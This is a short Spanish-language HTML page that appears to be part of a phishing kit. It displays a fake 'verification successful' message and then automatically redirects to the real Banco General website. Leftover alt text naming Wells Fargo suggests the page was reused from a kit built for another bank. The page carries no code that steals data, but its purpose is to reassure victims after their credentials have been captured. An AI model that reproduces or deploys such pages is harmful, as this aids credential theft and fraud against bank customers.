<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252">


   <meta http-equiv="Refresh" content="3;URL=https://www.bgeneral.com/">
<link href="favicon.ico" rel="icon" type="image/x-icon">

   

   
   
      
      
   


<title>Procesando... </title>


   <link rel="stylesheet" type="text/css" href="./procesando_files/wibscreen.css">

</head>               

<body bgcolor="#ffffff">



  
    
  






<!-- ********************************* Begin Body ************************** -->
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<div id="pause" align="center">
<table width="340" border="0" cellpadding="0" cellspacing="0">
  <tbody><tr>
    <td width="52" height="72">
      <img src="./procesando_files/favicon.ico" height="52" width="52" align="left" hspace="0" alt="Wells Fargo">
    </td>
    <td>
      <img src="./procesando_files/favicon.ico" height="1" width="2" border="0" alt="">
    </td>
    <td>
      <table width="265" height="40" border="1" cellpadding="5" cellspacing="0">
        <tbody><tr>
          <td width="230" valign="bottom" align="left">
            <span class="pausemsg">Verificación exitosa. Espere un momento!...</span>
          </td>
        </tr>
      </tbody></table>
    </td>
  </tr>

  

</tbody></table>
</div>




</body></html>